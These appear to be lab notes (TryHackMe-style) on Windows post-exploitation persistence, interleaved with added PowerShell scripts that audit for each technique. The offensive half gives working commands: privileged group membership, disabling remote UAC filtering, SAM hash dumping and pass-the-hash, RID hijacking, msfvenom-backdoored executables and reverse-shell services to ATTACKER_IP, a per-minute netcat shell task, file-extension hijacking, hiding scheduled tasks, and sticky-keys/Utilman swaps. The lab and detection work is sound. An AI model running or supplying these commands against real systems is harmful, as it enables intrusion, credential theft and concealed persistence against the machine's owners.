# Add to admin
net localgroup administrators oscar42 /add
# Add to Backup Operators. Members can read and write any file, including the registry hives, regardless of the DACL in place
net localgroup "Backup Operators" oscar42 /add
# Allow remote management (WinRM) access for the user
net localgroup "Remote Management Users" oscar42 /add
# Set LocalAccountTokenFilterPolicy to 1, which disables UAC remote restrictions so the local admin account gets a full token over the network
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /t REG_DWORD /v LocalAccountTokenFilterPolicy /d 1
Connect using Evil-WinRM
# Connect to box
evil-winrm -i 10.10.0.1 -u oscar42 -p Password321
# Check Groups
whoami /groups
# Download for secrets dump
reg save hklm\system system.bak
reg save hklm\sam sam.bak
download system.bak
download sam.bak
# Dump hashes using Impacket
python3.9 /opt/impacket/examples/secretsdump.py -sam sam.bak -system system.bak LOCAL
# Log in with the Administrator NT hash (the last field of the secretsdump line)
evil-winrm -i 10.10.0.1 -u Administrator -H 1cea1d7e8899f69e89088c4cb4bbdaa3
Special Privileges and Security Descriptors
Name                Description
SeBackupPrivilege   The user can read any file in the system, ignoring any DACL in place.
SeRestorePrivilege  The user can write any file in the system, ignoring any DACL in place.
# Export current config
secedit /export /cfg config.inf
# Add the user to the following lines in config.inf
SeBackupPrivilege = *S-1-5-32-544,*S-1-5-32-551,oscar42
SeRestorePrivilege = *S-1-5-32-544,*S-1-5-32-551,oscar42
# Convert the modified file to a database and apply it to the system
secedit /import /cfg config.inf /db config.sdb
secedit /configure /db config.sdb /cfg config.inf
# To allow WinRM access: open the security descriptor GUI, add the oscar42 user and grant Full Control
Set-PSSessionConfiguration -Name Microsoft.PowerShell -showSecurityDescriptorUI
# You can now connect over WinRM
evil-winrm -i 10.10.0.1 -u oscar42 -p Password321
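The three changes above (privileged group membership, LocalAccountTokenFilterPolicy, and explicit SeBackupPrivilege/SeRestorePrivilege assignments) are all visible from the host. The following audit script is an added example, not part of the original notes; it assumes an elevated PowerShell session on a Windows 10 / Server 2016 or later host with the built-in LocalAccounts module, and uses the same secedit export the notes use.

```powershell
# Added example (not from the original notes): audit the local-admin paths
# used above. Assumes an elevated shell on a Windows host with the
# LocalAccounts module (Windows 10 / Server 2016 and later).

$findings = @()

# 1. Membership of the groups the notes add the user to.
foreach ($group in 'Administrators', 'Backup Operators', 'Remote Management Users') {
    try {
        $members = Get-LocalGroupMember -Group $group -ErrorAction Stop
    } catch {
        continue  # group does not exist on this edition
    }
    foreach ($m in $members) {
        $findings += [pscustomobject]@{
            Check = "Group: $group"
            Value = "$($m.Name) ($($m.PrincipalSource))"
        }
    }
}

# 2. LocalAccountTokenFilterPolicy = 1 disables UAC remote restrictions,
#    so any local admin gets a full token over WinRM/SMB.
$polPath = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'
$pol = Get-ItemProperty -Path $polPath -Name LocalAccountTokenFilterPolicy -ErrorAction SilentlyContinue
if ($null -eq $pol) {
    $polState = 'not set (default: remote tokens filtered)'
} elseif ($pol.LocalAccountTokenFilterPolicy -eq 1) {
    $polState = '1 (remote UAC filtering DISABLED)'
} else {
    $polState = "$($pol.LocalAccountTokenFilterPolicy)"
}
$findings += [pscustomobject]@{ Check = 'LocalAccountTokenFilterPolicy'; Value = $polState }

# 3. Explicit SeBackupPrivilege / SeRestorePrivilege assignments.
#    *S-1-5-32-544 (Administrators) and *S-1-5-32-551 (Backup Operators)
#    are the defaults; anything else on the line is a finding.
$cfg = Join-Path $env:TEMP 'secpol-audit.inf'
secedit /export /cfg $cfg /areas USER_RIGHTS | Out-Null
$expected = '*S-1-5-32-544', '*S-1-5-32-551'
foreach ($line in Get-Content $cfg) {
    if ($line -match '^(SeBackupPrivilege|SeRestorePrivilege)\s*=\s*(.*)$') {
        $priv  = $Matches[1]
        $extra = $Matches[2].Split(',') | ForEach-Object { $_.Trim() } |
                 Where-Object { $_ -and $_ -notin $expected }
        $state = if ($extra) { "UNEXPECTED: $($extra -join ', ')" } else { 'defaults only' }
        $findings += [pscustomobject]@{ Check = $priv; Value = $state }
    }
}
Remove-Item $cfg -ErrorAction SilentlyContinue

$findings | Format-Table -AutoSize
```

Run it once on a clean build to record a baseline, then diff later runs against it; a plain username or SID appended to either privilege line, or a value of 1 for LocalAccountTokenFilterPolicy on a host that never needed it, is the kind of drift this section produces.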
Relative ID (RID) Hijacking
# List RIDs of all users
wmic useraccount get name,sid
>> wmic useraccount get name,sid
Name SID
Administrator S-1-5-21-1966530601-3185510712-10604624-500
DefaultAccount S-1-5-21-1966530601-3185510712-10604624-503
Guest S-1-5-21-1966530601-3185510712-10604624-501
oscar42 S-1-5-21-1966530601-3185510712-10604624-1010
WDAGUtilityAccount S-1-5-21-1966530601-3185510712-10604624-504
The important bit is the 1010 at the end of the SID for oscar42: this is the RID, and it needs to be changed to the Administrator's value, 500.
# Open regedit as SYSTEM using PsExec
PsExec64.exe -i -s regedit
Now modify the HKLM\SAM\SAM\Domains\Account\Users\ key for the user to elevate. Convert the RID to hex to find the user's subkey; in this case 1010 converts to 0x3f2.
Modify the F value so it holds the Administrator's RID, 0x1f4, with the byte order reversed.
Backdooring Files
Using MSFVenom
# Add a backdoor to Putty that executes a payload on run
msfvenom -a x64 --platform windows -x putty.exe -k -p windows/x64/shell_reverse_tcp lhost=ATTACKER_IP lport=4444 -b "\x00" -f exe -o puttyX.exe
Hijacking File Extensions
File extensions are registered under HKLM\Software\Classes\. Select an extension; the .txt extension, for example, points to the class txtfile. The command run when a file of that type is opened can then be changed at Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Classes\txtfile\shell\open\command
Save the script to c:\Windows\system32\backdoor.ps1 and change the registry value to powershell -windowstyle hidden C:\windows\system32\backdoor.ps1 %1. Opening any .txt file will now execute the payload.
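Because the hijack lives in a single registry value, it is cheap to check. The script below is an added example and not part of the original notes; it assumes a stock Windows install where the .txt handler (txtfile) resolves to notepad, and it generalises the check to every ProgID under HKLM\SOFTWARE\Classes rather than only txtfile.

```powershell
# Added example (not part of the original notes): look for script hosts and
# shells wired into file-type "open" handlers under HKLM:\SOFTWARE\Classes.
# Assumes a stock Windows install where txtfile opens with notepad.

$suspicious = 'powershell', 'pwsh', 'cmd.exe', 'wscript', 'cscript', 'mshta', 'rundll32', 'regsvr32'

# Resolve an extension to its ProgID and the command that runs on open.
function Get-OpenCommand {
    param([string]$Extension)
    $progId = (Get-ItemProperty -Path "HKLM:\SOFTWARE\Classes\$Extension" -ErrorAction SilentlyContinue).'(default)'
    if (-not $progId) { return $null }
    $cmdKey = "HKLM:\SOFTWARE\Classes\$progId\shell\open\command"
    $cmd = (Get-ItemProperty -Path $cmdKey -ErrorAction SilentlyContinue).'(default)'
    [pscustomobject]@{ Extension = $Extension; ProgId = $progId; Command = $cmd }
}

# Known-good reference for the case in the notes above.
$txt = Get-OpenCommand -Extension '.txt'
if ($txt -and $txt.Command -notmatch 'notepad\.exe') {
    Write-Warning ".txt handler ($($txt.ProgId)) is not notepad: $($txt.Command)"
}

# Generic sweep: any open command that launches an interpreter or shell.
$hits = Get-ChildItem 'HKLM:\SOFTWARE\Classes' -ErrorAction SilentlyContinue |
    Where-Object { $_.PSChildName -notlike '.*' } |       # skip extension keys, keep ProgIDs
    ForEach-Object {
        $key = "HKLM:\SOFTWARE\Classes\$($_.PSChildName)\shell\open\command"
        $cmd = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).'(default)'
        if ($cmd) {
            foreach ($s in $suspicious) {
                if ($cmd -match [regex]::Escape($s)) {
                    [pscustomobject]@{ ProgId = $_.PSChildName; Command = $cmd }
                    break
                }
            }
        }
    }

$hits | Format-Table -AutoSize -Wrap
```

The sweep will list a handful of legitimate ProgIDs that really do open with rundll32 or a script host, so treat the output as a triage list to compare against a baseline rather than a verdict; the handlers that matter most are those for document types a user opens by double-clicking.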
Services
Auto change admin password
This creates a service that changes the Administrator password to Passwd123 on startup.
sc.exe create THMservice binPath= "net user Administrator Passwd123" start= auto
sc.exe start THMservice
MSFVenom
On the attacker's machine:
# Creates a malicious service
msfvenom -p windows/x64/shell_reverse_tcp LHOST=ATTACKER_IP LPORT=4448 -f exe-service -o rev-svc.exe
On the target machine:
# After dropping the exe into C:\Windows\
sc.exe create malService binPath= "C:\windows\rev-svc.exe" start= auto
sc.exe start malService
Service hijacking
# List all services. Look for a stopped service, so that changing it is less
# likely to be noticed by AV tooling that monitors running services
sc.exe query state=all
# Query for information on a discovered service
sc.exe qc service1
# Change binary path for service
sc.exe config service1 binPath= "C:\Windows\rev-svc2.exe" start= auto obj= "LocalSystem"
# now you can either wait for the service to start itself, or start it manually with
sc.exe start service1
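All three service tricks above leave the same footprint: an auto-start service running as LocalSystem whose image sits somewhere other than the usual system directories, and (for newly created services) a Service Control Manager event. The script below is an added example, not part of the original notes; it assumes an elevated shell on the host and treats System32, SysWOW64 and the Program Files trees as the trusted image locations, which is an assumption you may need to widen for your own software.

```powershell
# Added example (not part of the original notes): triage services for the
# patterns above. Assumes an elevated shell; "trusted roots" is a local
# policy choice, not a Windows definition.

$trustedRoots = @("$env:SystemRoot\System32", "$env:SystemRoot\SysWOW64",
                  $env:ProgramFiles, ${env:ProgramFiles(x86)}) | Where-Object { $_ }

# Extract the image path from a service command line (quoted or bare).
function Get-ServiceImage {
    param([string]$PathName)
    if ($PathName -match '^"([^"]+)"') { return $Matches[1] }
    if ($PathName -match '^(\S+?\.exe)') { return $Matches[1] }
    return $PathName
}

$odd = Get-CimInstance Win32_Service | ForEach-Object {
    $image = Get-ServiceImage $_.PathName
    $inTrusted = $trustedRoots | Where-Object { $image -like "$_\*" }
    if ($_.StartMode -eq 'Auto' -and $_.StartName -eq 'LocalSystem' -and -not $inTrusted) {
        [pscustomobject]@{
            Name  = $_.Name
            Image = $image
            State = $_.State
        }
    }
}
Write-Host "Auto-start LocalSystem services with images outside trusted roots:"
$odd | Format-Table -AutoSize

# New services (System log, Service Control Manager, event 7045) in the last 7 days.
Write-Host "Services installed in the last 7 days (event 7045):"
Get-WinEvent -FilterHashtable @{ LogName = 'System'; Id = 7045; StartTime = (Get-Date).AddDays(-7) } -ErrorAction SilentlyContinue |
    Select-Object TimeCreated, @{ n = 'Summary'; e = { (($_.Message -split "`n") | Select-Object -First 4) -join ' ' } } |
    Format-Table -AutoSize -Wrap
```

Note the gap in the event check: repointing an existing service with sc config, as in the hijacking section, does not generate 7045 (only a start-type change is logged, as event 7040), so the image-path sweep is the check that catches that variant.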
Task Scheduler
# Create a task that establishes a connection every minute
schtasks /create /sc minute /mo 1 /tn TaskBackdoor /tr "c:\tools\nc64 -e cmd.exe ATTACKER_IP 4449" /ru SYSTEM
# Check if task was created
schtasks /query /tn taskbackdoor
Hide task
A task can be hidden by deleting its security descriptor (SD). The descriptors are stored under HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\. Select the task you created and delete its SD value.
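A task hidden this way is still in the TaskCache, it just lacks the SD value, and it will no longer appear in Task Scheduler or in Get-ScheduledTask. The script below is an added example, not part of the original notes; it walks the Tree key, reports entries without an SD value, and cross-checks the cache against what the scheduler API reports. It assumes it is run with read access to TaskCache (in practice as SYSTEM, for example via the same PsExec -s approach used earlier on this page).

```powershell
# Added example (not part of the original notes): find cached tasks with no
# security descriptor, and tasks present in the registry cache but not
# reported by the Task Scheduler API. Needs read access to TaskCache\Tree.

$tree = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree'
$treePrefix = (Get-Item $tree).PSPath

# Every subkey carrying an Id value is a task; folders have no Id.
$cached = Get-ChildItem -Path $tree -Recurse -ErrorAction SilentlyContinue |
    ForEach-Object {
        $props = Get-ItemProperty -Path $_.PSPath -ErrorAction SilentlyContinue
        if ($props.Id) {
            $rel = $_.PSPath -replace [regex]::Escape($treePrefix), ''
            [pscustomobject]@{
                TaskPath = $rel -replace '\\', '/'     # e.g. /Microsoft/Windows/.../Name
                HasSD    = [bool]$props.SD
                Id       = $props.Id
            }
        }
    }

$missingSd = @($cached | Where-Object { -not $_.HasSD })
Write-Host "Tasks in cache without a security descriptor: $($missingSd.Count)"
$missingSd | Format-Table TaskPath, Id -AutoSize

# Cross-check against the API view. TaskPath ends in a backslash, so
# TaskPath + TaskName gives the full path in the same shape as above.
$visible = Get-ScheduledTask | ForEach-Object { ($_.TaskPath + $_.TaskName) -replace '\\', '/' }
$ghosts = @($cached | Where-Object { $_.TaskPath -notin $visible })
Write-Host "Tasks in cache but not returned by Get-ScheduledTask: $($ghosts.Count)"
$ghosts | Format-Table TaskPath, HasSD -AutoSize
```

The two lists normally coincide; a task that shows up in the second list but has an SD is worth a look as well, since it means the cache and the API disagree for some other reason.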
Logon Triggered Persistence
Startup Folder
# Programs stored in the following folder will be run at startup
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\
Registry
# Create a REG_EXPAND_SZ value under this key pointing to the application
HKLM\Software\Microsoft\Windows\CurrentVersion\Run
# Add the path to the exe after the comma in the Userinit value under
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\
# Add a value called "UserInitMprLogonScript" holding the path to the exe under
HKCU\Environment
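The four logon-triggered locations above (startup folder, Run keys, Winlogon Userinit, UserInitMprLogonScript) can be dumped in one pass and diffed against a baseline. The script below is an added example, not part of the original notes; it assumes a stock Windows host, where the Userinit value holds a single userinit.exe entry and the Shell value holds only explorer.exe, and also covers the per-user startup folder and RunOnce keys, which the notes do not mention.

```powershell
# Added example (not from the original notes): dump logon-time persistence
# locations for baselining. Assumes a stock host (single-entry Userinit).

function Get-RegValues {
    param([string]$Path)
    $p = Get-ItemProperty -Path $Path -ErrorAction SilentlyContinue
    if (-not $p) { return }
    $p.PSObject.Properties |
        Where-Object { $_.Name -notmatch '^PS(Path|ParentPath|ChildName|Drive|Provider)$' } |
        ForEach-Object { [pscustomobject]@{ Location = $Path; Name = $_.Name; Value = $_.Value } }
}

$report = @()

# Startup folders: all users and the current user.
$startup = @(
    "$env:ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp",
    "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
)
foreach ($dir in $startup) {
    Get-ChildItem -Path $dir -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.Name -ne 'desktop.ini' } |
        ForEach-Object { $report += [pscustomobject]@{ Location = $dir; Name = $_.Name; Value = $_.FullName } }
}

# Run / RunOnce for machine and user.
foreach ($hive in 'HKLM', 'HKCU') {
    foreach ($k in 'Run', 'RunOnce') {
        $report += Get-RegValues "${hive}:\Software\Microsoft\Windows\CurrentVersion\$k"
    }
}

# Winlogon Userinit / Shell: more than one comma-separated entry is a finding.
$wl = Get-ItemProperty 'HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Winlogon'
foreach ($name in 'Userinit', 'Shell') {
    $val = [string]$wl.$name
    $entries = @(($val -split ',') | ForEach-Object { $_.Trim() } | Where-Object { $_ })
    $flag = if ($entries.Count -gt 1) { '  <-- extra entries' } else { '' }
    $report += [pscustomobject]@{ Location = 'Winlogon'; Name = $name; Value = "$val$flag" }
}

# Legacy logon-script hook in the user's environment block.
$mpr = (Get-ItemProperty 'HKCU:\Environment' -ErrorAction SilentlyContinue).UserInitMprLogonScript
if ($mpr) {
    $report += [pscustomobject]@{ Location = 'HKCU:\Environment'; Name = 'UserInitMprLogonScript'; Value = $mpr }
}

$report | Format-Table -AutoSize -Wrap
```

The HKCU entries are only those of the account running the script; to cover every profile on the host, load each user's NTUSER.DAT hive (reg load) and repeat the HKCU checks against it.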
Logon Screen
Sticky Keys
takeown /f c:\Windows\System32\sethc.exe
icacls C:\Windows\System32\sethc.exe /grant Administrator:F
copy c:\Windows\System32\cmd.exe C:\Windows\System32\sethc.exe
# Pressing Shift five times at the lock screen will now pop a shell
Utilman
takeown /f c:\Windows\System32\Utilman.exe
icacls C:\Windows\System32\Utilman.exe /grant Administrator:F
copy c:\Windows\System32\cmd.exe C:\Windows\System32\Utilman.exe
# Clicking the accessibility (Ease of Access) button on the logon screen will now pop a shell
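Both swaps above leave three traces: the accessibility binary now hashes identically to cmd.exe, its owner is no longer TrustedInstaller (takeown changed it), and its ACL carries a write-capable entry for an administrator (icacls added it). The script below is an added example, not part of the original notes; it checks those three things for sethc.exe and Utilman.exe and, as a generalisation, for the other logon-screen accessibility binaries that can be abused the same way. Note that an Authenticode check is not useful here, because System32 binaries are catalog-signed by content hash, so a copied cmd.exe still validates.

```powershell
# Added example (not from the original notes): detect a cmd.exe swap of the
# logon-screen accessibility binaries. Assumes an elevated shell; the list of
# binaries is a superset of the two named in the notes.

$sys32   = "$env:SystemRoot\System32"
$targets = 'sethc.exe', 'Utilman.exe', 'osk.exe', 'Narrator.exe', 'Magnify.exe', 'DisplaySwitch.exe', 'AtBroker.exe'
$cmdHash = (Get-FileHash -Path "$sys32\cmd.exe" -Algorithm SHA256).Hash

$results = foreach ($name in $targets) {
    $path = Join-Path $sys32 $name
    if (-not (Test-Path $path)) { continue }

    $hash = (Get-FileHash -Path $path -Algorithm SHA256).Hash
    $acl  = Get-Acl -Path $path

    # Stock ACLs give only TrustedInstaller write rights; anyone else with
    # Write/Modify/FullControl got it from icacls or similar.
    $writers = @($acl.Access | Where-Object {
        $_.AccessControlType -eq 'Allow' -and
        $_.IdentityReference -notmatch 'TrustedInstaller' -and
        $_.FileSystemRights -match 'FullControl|Modify|Write'
    })

    $issues = @()
    if ($hash -eq $cmdHash)                      { $issues += 'content is cmd.exe' }
    if ($acl.Owner -notmatch 'TrustedInstaller') { $issues += "owner=$($acl.Owner)" }
    if ($writers.Count -gt 0)                    { $issues += "write ACE for $(($writers.IdentityReference | ForEach-Object { $_.Value }) -join ',')" }

    $status = if ($issues.Count -gt 0) { $issues -join '; ' } else { 'ok' }
    [pscustomobject]@{ File = $name; SHA256 = $hash.Substring(0, 16) + '...'; Status = $status }
}

$results | Format-Table -AutoSize -Wrap
```

A clean host reports ok for every row; "content is cmd.exe" is conclusive on its own, while an owner or ACE change without a hash match means the file was prepared for replacement (or replaced with something other than cmd.exe) and should be compared against a known-good copy.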